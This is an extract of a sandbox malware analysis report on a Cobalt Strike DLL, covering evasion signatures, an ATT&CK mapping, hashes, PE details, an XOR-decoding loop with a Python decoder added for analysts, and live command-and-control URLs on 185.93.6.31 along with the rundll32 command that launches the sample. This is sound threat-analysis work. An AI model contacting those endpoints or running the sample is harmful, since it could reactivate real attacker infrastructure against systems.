          Source: C:\Windows\System32\loaddll64.exe TID: 4456 Thread sleep time: -120000s >= -30000s
          Source: C:\Windows\System32\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
          Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
          Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed
          Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
          Source: rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWp
          Source: rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.638463939.0000012254C98000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
          Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\rundll32.exe Network Connect: 185.93.6.31 145
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\GnGmRmwtZJjkTEt.dll',#1
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmp Binary or memory string: Progman
          Source: rundll32.exe, 00000003.00000002.638319445.0000019BD6610000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.639482450.0000012255150000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.639076369.00000243BCD50000.00000002.00020000.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Windows\System32\rundll32.exe Code function: 3_2_0000019BD8312B5C GetUserNameA,strrchr,_snprintf,

          Remote Access Functionality:

          Yara detected CobaltStrike
          Source: Yara match File source: 00000005.00000003.251028132.00000243BE620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000003.244001600.0000012256A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000003.243495836.0000019BD7F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 3.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.rundll32.exe.6bc00000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000005.00000002.636963833.000000006BC03000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.636959360.000000006BC03000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.641133563.00000243BE250000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.636991024.000000006BC03000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.640457266.0000019BD7B00000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.641196073.0000012256620000.00000020.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter2 | Path Interception | Process Injection112 | Virtualization/Sandbox Evasion11 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection112 | LSASS Memory | Virtualization/Sandbox Evasion11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll321 | NTDS | Account Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Owner/User Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol112 | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

Behavior Graph ID: 490528; Sample: GnGmRmwtZJjkTEt.dll; Start date: 25/09/2021; Architecture: WINDOWS; Score: 88

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Yara detected CobaltStrike; 2 other signatures

Process chain: loaddll64.exe started rundll32.exe, a second rundll32.exe and cmd.exe; cmd.exe started a third rundll32.exe

Signature on the first rundll32.exe: System process connects to network (likely due to code injection or exploit)

Network: the second rundll32.exe contacted 185.93.6.31 (CDN77GB, France) over three connections with local ports 49740, 49741 and 49742

          Screenshots

Thumbnails: screenshot images are not reproduced in this text extract.

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner
GnGmRmwtZJjkTEt.dll | 6% | Virustotal

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8 | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJx | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJeK | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ-/E | 0% | Avira URL Cloud | safe
185.93.6.31 | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2;/3 | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ4899f5f57b9a | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2 | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJmK | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJE | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2dll | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2$c | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJOMDCBHADPPFCEHFDNPACA | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJeQ | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2& | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJsc | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJMQ | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJindows | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJography | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJws | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJkh | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ$ | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8- | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2L | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ5K | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJph | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ~h | 0% | Avira URL Cloud | safe
http://185.93.6.31:8081/Calculate/team/WIQK6GMJT | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
185.93.6.31 | true | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2 | true | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8 | rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJx | rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJeK | rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ-/E | rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2;/3 | rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ4899f5f57b9a | rundll32.exe, 00000005.00000002.638169896.00000243BC8F2000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJmK | rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJE | rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://jqueryui.com | rundll32.exe, 00000005.00000003.335866871.00000243BC911000.00000004.00000001.sdmp; rundll32.exe, 00000005.00000002.641154135.00000243BE628000.00000004.00000001.sdmp | false | none | high
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2dll | rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2$c | rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJOMDCBHADPPFCEHFDNPACA | rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJeQ | rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2& | rundll32.exe, 00000003.00000002.637621394.0000019BD604E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJsc | rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJMQ | rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJindows | rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp; rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJography | rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJws | rundll32.exe, 00000004.00000002.637898471.0000012254C38000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJkh | rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ$ | rundll32.exe, 00000005.00000002.637999840.00000243BC8CF000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJMK | rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmp | false | none | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ8- | rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Register/v7.19/UJCIF1N2L | rundll32.exe, 00000005.00000002.637497118.00000243BC870000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ5K | rundll32.exe, 00000004.00000002.638543704.0000012254CB6000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJph | rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJ~h | rundll32.exe, 00000005.00000002.638113535.00000243BC8E9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://185.93.6.31:8081/Calculate/team/WIQK6GMJT | rundll32.exe, 00000003.00000002.637970177.0000019BD6091000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

              Contacted IPs


              Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.93.6.31 | unknown | France | 60068 | CDN77GB | true

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:490528
              Start date:25.09.2021
              Start time:20:17:14
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 7m 23s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:GnGmRmwtZJjkTEt.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Run name:Run with higher sleep bypass
Number of new started processes analysed:29
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal88.troj.evad.winDLL@9/0@0/1
              EGA Information:
              • Successful, ratio: 75%
              HDC Information:
              • Successful, ratio: 3.5% (good quality ratio 2.7%)
              • Quality average: 61.9%
              • Quality standard deviation: 41.1%
              HCA Information:
              • Successful, ratio: 86%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Sleeps bigger than 120000ms are automatically reduced to 1000ms
              • Found application associated with file extension: .dll
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 93.184.221.240, 20.54.110.249, 40.112.88.60, 80.67.82.211, 80.67.82.235
              • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, ris.api.iris.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

Match: CDN77GB

Associated Sample Name / URL | Detection | Context (IP)
GnGmRmwtZJjkTEt.dll | malicious | 185.93.6.31
INVOICE.exe | malicious | 89.187.165.193
9eh0jsdlic.exe | malicious | 84.17.52.51
globalfoundries.com.htm | malicious | 89.187.169.47
globalfoundries.com.htm | malicious | 89.187.169.47
blg.com.htm | malicious | 89.187.169.47
1J5sT000kJ.exe | malicious | 156.146.50.177
sora.arm7 | malicious | 195.181.169.2
lBxUmgptLl | malicious | 156.146.54.96
GeruDanfe.msi | malicious | 89.187.165.193
NphUWSRtl4 | malicious | 104.238.37.84
S6DNzkh376 | malicious | 156.146.54.93
qLadwVPkMz | malicious | 156.146.54.80
y1FOl1vVPA.exe | malicious | 84.17.46.50
sb3TEzvdAT | malicious | 156.146.54.92
4fy0Wb1EUX.exe | malicious | 212.102.39.205
KO7UuzwSSQ.exe | malicious | 84.17.52.9
wbEjg6mZB8.exe | malicious | 195.181.169.92
35ssjgTNda.exe | malicious | 84.17.52.18
UNj0uT3a36.exe | malicious | 195.181.169.92

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:PE32+ executable (DLL) (console) x86-64, for MS Windows
              Entropy (8bit):4.963098044166054
              TrID:
              • Win64 Dynamic Link Library (generic) (102004/3) 86.41%
              • Win64 Executable (generic) (12005/4) 10.17%
              • Generic Win/DOS Executable (2004/3) 1.70%
              • DOS Executable Generic (2002/1) 1.70%
              • VXD Driver (31/22) 0.03%
              File name:GnGmRmwtZJjkTEt.dll
              File size:95803
              MD5:c84d4ead6c5a2afa9e844806de549dcf
              SHA1:328b4f055dce47161d735ef74f982925def45ee5
              SHA256:829751cfdc2376e916244f94baf839ce4491ccb75f0a89778c092bde79bd8643
              SHA512:ea1544209ea29df196ec9fe4075624c666e3018cb13e640a16ecac23079376444278288813fa709cc97a9a997cd47cd5e18b2256c2605883ed2d3e8479df00ad
              SSDEEP:768:O9zcAqwQoJ2UM9HomkyMwT+MhYlV6DRPdetYQkZIdEKDWr+BTgp3bLCP6yqn8RU:OmpIJ3R1yMcYD6DmqBoKa8MCSU
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...'.Ma.$........& ...#.....8......P..........k.....................................D........ ............................

              File Icon

              Icon Hash:74f0e4ecccdce0e4

              Static PE Info

              General

              Entrypoint:0x6bc01350
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x6bc00000
              Subsystem:windows cui
              Image File Characteristics:EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x614DFE27 [Fri Sep 24 16:34:47 2021 UTC]
              TLS Callbacks:0x6bc01810
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:2b85eda5e2ca4805e05003741ab3fe72

              Entrypoint Preview

Instruction (as decoded by the report in 32-bit mode; the file is PE32+, so under 64-bit decoding the dec eax, dec ebp, dec esp and inc ecx bytes are REX prefixes and arpl ax, dx is movsxd rdx, eax)
              dec eax
              mov eax, dword ptr [00002F09h]
              mov dword ptr [eax], 00000000h
              jmp 00007F80CCAAF8C3h
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              mov edx, ecx
              dec eax
              lea ecx, dword ptr [00005C86h]
              jmp 00007F80CCAB0AF6h
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007F80CCAAFA09h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              test edx, edx
              je 00007F80CCAAFA48h
              dec ebp
              lea edx, dword ptr [ecx-01h]
              xor eax, eax
              dec esp
              lea ecx, dword ptr [ecx+edx]
              nop
              dec eax
              arpl ax, dx
              dec esp
              cmp edx, edx
              je 00007F80CCAAFA3Ah
              inc ecx
              movzx edx, byte ptr [eax+edx]
              xor byte ptr [ecx], dl
              dec eax
              add ecx, 01h
              add eax, 01h
              dec esp
              cmp ecx, ecx
              jne 00007F80CCAAFA07h
              ret
              nop dword ptr [eax+00h]
              inc ecx
              movzx eax, byte ptr [eax]
              xor byte ptr [ecx], al
              dec eax
              add ecx, 01h
              dec esp
              cmp ecx, ecx
              je 00007F80CCAAFA0Eh
              mov eax, 00000001h
              jmp 00007F80CCAAF9ECh
              nop word ptr [eax+eax+00000000h]
              mov eax, 00000001h
              ret
              nop word ptr [eax+eax+00000000h]
              inc ecx
              push esp
              push edi
              push esi
              push ebx
              dec eax
              sub esp, 48h
              mov ecx, dword ptr [00001C69h]
              dec eax
              lea eax, dword ptr [00001CA2h]
              xor edx, edx
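The byte loop in the preview above (a key byte fetched with movzx through an index, xor'ed into the byte at the current buffer pointer, pointer and index advanced, and the index reset to the start of the key when it reaches a bound) has the shape of a repeating-key XOR decoder. The Python below is an added worked example, not code from the sample or from the report: it implements that transform and the check a practitioner runs on a blob carved from memory, recovering the key from a known plaintext prefix such as a PE's DOS header. The sample plaintext, key and blob are constructed here, and the reading of which register holds the key, buffer and length is an inference from the listing, not something the page states.

```python
"""Repeating-key XOR: the transform and a known-plaintext key recovery.

Added illustration; SAMPLE_* values below are constructed, not taken from the sample.
"""
from __future__ import annotations

from itertools import cycle


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """data[i] ^ key[i % len(key)] for every byte; encrypt and decrypt are the same call."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(blob: bytes, known_prefix: bytes, key_len: int) -> bytes | None:
    """Derive a key of length key_len from a known plaintext prefix.

    The first key_len prefix positions fix every key byte; the remaining prefix
    positions must agree with that key, otherwise key_len is wrong and None is returned.
    A prefix shorter than key_len cannot determine the key, so that also returns None.
    """
    if key_len <= 0 or len(known_prefix) < key_len or len(blob) < len(known_prefix):
        return None
    key = bytes(blob[i] ^ known_prefix[i] for i in range(key_len))
    for i in range(key_len, len(known_prefix)):
        if blob[i] ^ key[i % key_len] != known_prefix[i]:
            return None
    return key


def find_key(blob: bytes, known_prefix: bytes, max_len: int = 16) -> bytes | None:
    """Return the key for the shortest key length that explains the known prefix, or None."""
    for n in range(1, max_len + 1):
        key = recover_key(blob, known_prefix, n)
        if key is not None:
            return key
    return None


# Constructed sample: the 16 leading bytes are the DOS-header values most MSVC and MinGW
# images share (e_magic through e_maxalloc), a reasonable known-plaintext guess for a
# carved PE; the filler after them and the key are arbitrary.
SAMPLE_PLAINTEXT = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"\xb8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00"
    + b"This program cannot be run in DOS mode."
)
SAMPLE_KEY = b"\xa5\xc3\x17"
SAMPLE_BLOB = xor_repeating(SAMPLE_PLAINTEXT, SAMPLE_KEY)


def recover_sample() -> tuple[bytes | None, bytes]:
    """Recover SAMPLE_KEY from the first 16 blob bytes, then decode the whole blob with it."""
    key = find_key(SAMPLE_BLOB, SAMPLE_PLAINTEXT[:16])
    decoded = xor_repeating(SAMPLE_BLOB, key) if key else b""
    return key, decoded


if __name__ == "__main__":
    k, dec = recover_sample()
    print("key:", k.hex() if k else None, "| decoded starts with:", dec[:2])
```

On a real carve the known prefix is whatever the analyst expects at offset 0 (the DOS header for a PE, the first bytes of a known config structure otherwise); a key length that survives the consistency check over 16 bytes of plaintext is rarely a false positive, and a longer expected prefix tightens it further.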

              Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x8000 | 0x52 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9000 | 0x3d0 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc000 | 0x348 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5000 | 0x1d4 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd000 | 0x60 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4040 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9114 | 0xd8 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

              Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1688 | 0x1800 | False | 0.55419921875 | data | 5.85744345083 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_CNT_CODE, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
.data | 0x3000 | 0x4c0 | 0x600 | False | 0.647135416667 | data | 5.84721957186 | IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_MEM_READ
